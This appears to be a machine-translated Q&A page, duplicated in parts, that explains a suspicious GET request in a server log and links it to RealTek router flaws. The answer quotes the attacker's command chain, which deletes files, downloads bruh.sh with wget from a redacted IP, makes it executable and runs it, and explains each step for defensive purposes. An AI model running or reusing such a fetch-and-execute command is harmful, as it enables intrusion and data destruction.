我的服务器收到奇怪的 GET 请求：我应该担心吗？

Question

你不必担心。

如果您的服务器没有问题，那么您就没事了，您看到的只是有人试图入侵您的服务器。服务器日志将记录对您服务器的所有访问，包括此类入侵尝试。

但同样，如果您的服务器没有问题，那么您可以忽略此请求。互联网上的服务器不断受到漏洞探测。只要您的服务器已打上补丁并保持最新状态，您就没问题。

更多细节：您这样说：

“从外观上看，好像有人试图通过它提取脚本wget，rm -rf我应该担心吗？”

这里的关键词是“尝试”而不是“做”；关键点是他们没有成功。以下是发送到服务器的命令的细目；换行符;使内容更易读：

rm -rf *;
cd /tmp;
wget http://(ip adress)/bruh.sh;
chmod 777 bruh.sh;
./bruh.sh

该脚本似乎想要执行以下操作：

rm -rf *;：删除工作目录中的所有内容。
cd /tmp;：进入/tmp目录。
wget http://(ip adress)/bruh.sh;bruh.sh：尝试从位于的服务器获取名为的脚本(ip adress)。
chmod 777 bruh.sh;：将脚本的权限更改bruh.sh为777。
./bruh.sh：运行脚本。

但最终它什么也没做。

我说它什么都没做是因为你的服务器没问题，对吗？如果它什么都没做，那么这肯定是一次黑客攻击。但如果它什么都没做，那就失败了。记录并不意味着脚本被评估并运行。

如果您的系统是最新的，则不必担心。这只是发送到您的服务器的参数字符串的日志，而不是运行的内容。

存在风险的地方是像臭名昭著的Log4j 缺陷(Java) 允许命令以与日志文件中看到的完全相同的方式传入……但 Log4j 会评估该字符串并运行它。这确实存在风险。

但即使是 Log4j，在 2024 年的今天也是安全的，因为它至少已经修补了 2 年。如果你不运行 Java 服务器？甚至不必担心 Log4j。100% 无需担心。

服务器记录所有访问。

好的、坏的、成功的和失败的访问都会被服务器记录下来。尤其是暴露在互联网上的服务器。你无法阻止任何人以不受欢迎的方式访问你的服务器。但只要你的服务器打了补丁并且是最新的，你就没事了。

更新：感谢Yorik 的评论，这似乎是对BYTEVALUE 公司生产的基于 RealTek SoC 的路由器。详情如下：

包含“goform”的 URL 通常与 RealTek SDK 相关联。基于 RealTek SoC（片上系统）构建的路由器通常使用 SDK 来实现基于 Web 的访问工具。RealTek SDK 过去存在许多漏洞。我们目前使用“/goform/”URL 在我们的蜜罐中跟踪了 900 多个唯一 URL。最受欢迎的 URL 通常是“goform/set_LimitClient_cfg”，与 LB-Link 路由器中的 CVE-2023-26801 相关联。但简单的密码暴力攻击也很常见，利用默认密码。

到目前为止，我还没有找到与“goform/webRead/open”相关的漏洞的具体 CVE 编号。但是，11 月份的一篇中文博客文章表明，这与中国公司“BYTEVALUE”生产的路由器中的漏洞有关。我找不到该漏洞的补丁。

因此，除非您的服务器是 BYTEVALUE 制造的路由器（我对此表示怀疑），否则您真的没有理由担心。所有先前的建议仍然适用；别担心，开心就好。

Answer 1

你不必担心。

如果您的服务器没有问题，那么您就没事了，您看到的只是有人试图入侵您的服务器。服务器日志将记录对您服务器的所有访问，包括此类入侵尝试。

但同样，如果您的服务器没有问题，那么您可以忽略此请求。互联网上的服务器不断受到漏洞探测。只要您的服务器已打上补丁并保持最新状态，您就没问题。

更多细节：您这样说：

“从外观上看，好像有人试图通过它提取脚本wget，rm -rf我应该担心吗？”

这里的关键词是“尝试”而不是“做”；关键点是他们没有成功。以下是发送到服务器的命令的细目；换行符;使内容更易读：

rm -rf *;
cd /tmp;
wget http://(ip adress)/bruh.sh;
chmod 777 bruh.sh;
./bruh.sh

该脚本似乎想要执行以下操作：

rm -rf *;：删除工作目录中的所有内容。
cd /tmp;：进入/tmp目录。
wget http://(ip adress)/bruh.sh;bruh.sh：尝试从位于的服务器获取名为的脚本(ip adress)。
chmod 777 bruh.sh;：将脚本的权限更改bruh.sh为777。
./bruh.sh：运行脚本。

但最终它什么也没做。

我说它什么都没做是因为你的服务器没问题，对吗？如果它什么都没做，那么这肯定是一次黑客攻击。但如果它什么都没做，那就失败了。记录并不意味着脚本被评估并运行。

如果您的系统是最新的，则不必担心。这只是发送到您的服务器的参数字符串的日志，而不是运行的内容。

存在风险的地方是像臭名昭著的Log4j 缺陷(Java) 允许命令以与日志文件中看到的完全相同的方式传入……但 Log4j 会评估该字符串并运行它。这确实存在风险。

但即使是 Log4j，在 2024 年的今天也是安全的，因为它至少已经修补了 2 年。如果你不运行 Java 服务器？甚至不必担心 Log4j。100% 无需担心。

服务器记录所有访问。

好的、坏的、成功的和失败的访问都会被服务器记录下来。尤其是暴露在互联网上的服务器。你无法阻止任何人以不受欢迎的方式访问你的服务器。但只要你的服务器打了补丁并且是最新的，你就没事了。

更新：感谢Yorik 的评论，这似乎是对BYTEVALUE 公司生产的基于 RealTek SoC 的路由器。详情如下：

包含“goform”的 URL 通常与 RealTek SDK 相关联。基于 RealTek SoC（片上系统）构建的路由器通常使用 SDK 来实现基于 Web 的访问工具。RealTek SDK 过去存在许多漏洞。我们目前使用“/goform/”URL 在我们的蜜罐中跟踪了 900 多个唯一 URL。最受欢迎的 URL 通常是“goform/set_LimitClient_cfg”，与 LB-Link 路由器中的 CVE-2023-26801 相关联。但简单的密码暴力攻击也很常见，利用默认密码。

到目前为止，我还没有找到与“goform/webRead/open”相关的漏洞的具体 CVE 编号。但是，11 月份的一篇中文博客文章表明，这与中国公司“BYTEVALUE”生产的路由器中的漏洞有关。我找不到该漏洞的补丁。

因此，除非您的服务器是 BYTEVALUE 制造的路由器（我对此表示怀疑），否则您真的没有理由担心。所有先前的建议仍然适用；别担心，开心就好。

我的服务器收到奇怪的 GET 请求：我应该担心吗？

答案1

你不必担心。

但最终它什么也没做。

服务器记录所有访问。

相关内容